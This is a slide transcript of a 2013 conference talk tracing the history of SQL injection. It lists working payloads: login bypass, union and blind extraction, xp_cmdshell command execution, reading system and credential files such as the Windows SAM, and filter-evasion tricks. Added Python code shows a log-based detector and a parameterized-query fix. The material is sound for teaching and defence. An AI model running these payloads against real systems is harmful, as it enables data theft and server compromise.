Chema Alonso - Hachetetepe dospuntos slaac slaac [Rooted CON 2013]
Chema Alonso
Transcript of Chema Alonso
-
8/10/2019 Chema Alonso
1/51
Happy 15th anniversary, SQL Injection!
What this talk is not about
This is about Love
Los Amantes del Círculo Polar
25 Dec 1998: The birth
http://www.phrack.org/issues.html?id=8&issue=54
Beginning
Tautology
q="Select uid from users where uid='"+$user+"' and pass='"+$pass+"';"
admin
' or '1'='1
q=Select uid from users where uid='admin' and pass='' or '1'='1';
14 Aug 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
Place
In-band
-1 union select 1,1,1,1,username,1,a,1 from users --
2001 - Out-of-band
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
Yesterday - [Microsoft][ODBC SQL Server Driver]
[SQL Server]Incorrect syntax near the keyword 'or'.
q="Select title from noticias where id="+$id+";"
Id=1 or 1=(select top 1 username from sysusers) --
Jul 2007: Microsoft Partner Programme
2002: Advanced SQL Injection Techniques
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
Advanced Tricks
Id= 1; shutdown --
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
27 Mar 2007
Outer Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
Eyes of Fear
2002 - Blind
http://server/miphp.php?id=1 and 1=1
http://server/miphp.php?id=1 and 1=0
True
False
2010: US Army
Time
2002: Time-Based Blind SQL Injection
http://www.northernfortress.net/more_advanced_sql_injection.pdf
(more) Advanced Tricks
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'
ping -n 10 127.0.0.1
2004: Time-Based in Other Databases
SQL Server
1) ; if <condition> waitfor delay
2) ; exec xp_cmdshell (ping -n)
Oracle
1) dbms_lock.sleep()
PL/SQL Injection
MySQL
1) and sleep() (5.0 or higher)
2) Benchmark functions
Postgres
1) pg_sleep()
Jun 2007: Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
Apr 2013: Yahoo!
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
2007: Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
Time-Based Using Heavy Queries in MS Access
True
False
Deep Blind SQL Injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
Ace
Serialized SQL Injection
union select '1','2','3',(select * from sysusers for xml raw, binary base64)
pass=
Inverted Queries - Lefties
q="Select uid from users where '"+$user+"'=user and '"+$pass+"'=pass;"
Arithmetic Blind SQL Injection
Id=A+(1/(ASCII(B)-C))
Id=A+ASCII(B)-C
Id=A+((C/ASCII(B))*(K))
RFD (Remote File Downloading) - SQL Server 2K
And 200>ASCII(SUBSTRING((SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;', 'select top 1 * from c:\dir\target.txt')),1,1))
; Create Table TempTable (row varchar(8000)) --
; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n') --
; alter table TempTable add num int IDENTITY(1,1) NOT NULL
and (select COUNT(row) from TempTable)
and (select top 1 len(row) from TempTable where num = rownum)
and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1)
; Drop Table TempTable--
RFD (Remote File Downloading) - SQL Server 2K5 and later
AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK
'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))
RFD (Remote File Downloading) - MySQL
LoadFile
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
Load Data infile
; Create table C8DFC643 (datos varchar(4000))
; Load data infile 'c:\\boot.ini' into table C8DFC643
; alter table C8DFC643 add column num integer auto_increment unique key
and (select count(num) from C8DFC643) and (select length(datos) from C8DFC643 where num = 1)
and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
; Drop table C8DFC643
RFD (Remote File Downloading) - Oracle
External Tables & Plain Text Files
; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; --
; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end; --
DBMS_LOB
; execute immediate DECLARE l_bfile BFILE; l_blob BLOB;
BEGIN
INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob;
l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
DBMS_LOB.loadfromfile(l_blob, l_bfile, DBMS_LOB.getlength(l_bfile));
DBMS_LOB.fileclose(l_bfile);
COMMIT;
EXCEPTION
WHEN OTHERS THEN ROLLBACK;
END;
; end; --
CSRF+SQLi
Smuggling
/**/aNd/**/1=aSC(substr(user(),1,1))%00
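As an added detection example in Python (not code from the deck or its author): the normalisation step undoes the smuggling tricks on this slide (URL encoding, /**/ as whitespace, mixed case, a trailing %00) before matching the delay primitives from the "Time-Based in Other Databases" slide and the inference probes from the Blind slides against web-server log lines. The log lines, the log format and the signature labels are constructed assumptions for the demo.

```python
import re
from urllib.parse import unquote

# Signatures for the delay primitives on the "Time-Based in Other Databases"
# slide plus the inference probes from the Blind and Smuggling slides.
SIGNATURES = [
    ("time:mssql", re.compile(r"\bwaitfor\s+delay\b")),
    ("stacked:xp_cmdshell", re.compile(r"\bxp_cmdshell\b")),
    ("time:oracle", re.compile(r"\bdbms_lock\.sleep\s*\(")),
    ("time:mysql", re.compile(r"\b(?:sleep|benchmark)\s*\(")),
    ("time:postgres", re.compile(r"\bpg_sleep\s*\(")),
    ("inference:ascii-substr", re.compile(r"\basc(?:ii)?\s*\(\s*substr(?:ing)?\s*\(")),
    ("inference:boolean", re.compile(r"\band\s+1\s*=\s*[01]\b")),
]
INLINE_COMMENT = re.compile(r"/\*.*?\*/")
# Minimal common-log shape (assumed): client, ident, user, [time], "METHOD URL ..."
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def normalise(query_string):
    # Undo the smuggling tricks before matching: decode twice (double-encoded
    # payloads), treat a NUL as a space instead of truncating on it the way a
    # C-string filter would, turn /**/ back into whitespace, and fold case.
    s = unquote(unquote(query_string))
    s = s.replace("\x00", " ")
    s = INLINE_COMMENT.sub(" ", s)
    return s.lower()


def scan_request(url):
    # Sorted list of signature labels that fire on the URL's query string.
    _, _, qs = url.partition("?")
    text = normalise(qs)
    return sorted(label for label, pat in SIGNATURES if pat.search(text))


def scan_log(text):
    # (client ip, labels) for every request line that trips a signature.
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        labels = scan_request(url)
        if labels:
            findings.append((ip, labels))
    return findings


# Constructed log lines for the demo, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2013:10:00:01 +0200] "GET /index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1" 200 512
10.0.0.6 - - [10/Apr/2013:10:00:02 +0200] "GET /news.asp?id=1;%20waitfor%20delay%20'0:0:5'-- HTTP/1.1" 500 98
10.0.0.7 - - [10/Apr/2013:10:00:03 +0200] "GET /item.php?id=1/**/aNd/**/1=aSC(substr(user(),1,1))%00 HTTP/1.1" 200 230
10.0.0.8 - - [10/Apr/2013:10:00:04 +0200] "GET /item.php?id=42&sort=sleeping HTTP/1.1" 200 230
"""

if __name__ == "__main__":
    for ip, labels in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(labels))
```

The fourth line is a deliberate near-miss ("sleeping" with no call parenthesis) to show the signatures key on the function call, not the bare word.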
Braveness
Connection String Parameter Pollution
http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-String-Parameter-Pollution-wp.pdf
XPath Injection
http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf
LDAP Injection
http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
OWASP TOP 10 - 2013
Forbidden
q="Select uid from users where uid='"+$user+"' and pass='"+$pass+"';"
Use brain, not tech
PHP Magic Quotes? -> id=1 and 1=1
Python? -> Not invulnerable
.NET? -> Not invulnerable
LINQ? -> Not invulnerable
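Added here as a worked example (not code from the deck or its author), in Python against an in-memory SQLite table constructed for the demo: the concatenated query from the Tautology and Forbidden slides beside a parameterized one, both fed the `' or '1'='1` input. The table contents and the `login_*` helper names are assumptions.

```python
import sqlite3

# Constructed demo users, not data from the deck.
USERS = [("admin", "s3cret"), ("guest", "guest")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (uid text, pass text)")
    conn.executemany("insert into users values (?, ?)", USERS)
    return conn


def login_concat(conn, user, password):
    # The "Forbidden" pattern: user input pasted into the SQL text,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    q = ("Select uid from users where uid='" + user +
         "' and pass='" + password + "';")
    return sorted(r[0] for r in conn.execute(q))


def login_param(conn, user, password):
    # Placeholders: the driver sends the input as a bound value,
    # so a quote in it is just a character inside the string.
    q = "Select uid from users where uid=? and pass=?;"
    return sorted(r[0] for r in conn.execute(q, (user, password)))


def demo():
    conn = make_db()
    tautology = "' or '1'='1"  # the input from the Tautology slide
    return {
        "concat_good": login_concat(conn, "admin", "s3cret"),
        # AND binds tighter than OR, so the WHERE clause becomes
        # (uid='admin' and pass='') or ('1'='1'): every row matches.
        "concat_bad": login_concat(conn, "admin", tautology),
        "param_good": login_param(conn, "admin", "s3cret"),
        # The same input is compared literally against the stored password.
        "param_bad": login_param(conn, "admin", tautology),
    }


if __name__ == "__main__":
    for name, uids in demo().items():
        print(name, uids)
```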
Fixing Code Injections isn't the worst job
More
@chemaalonso
http://www.elladodelmal.com
http://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.html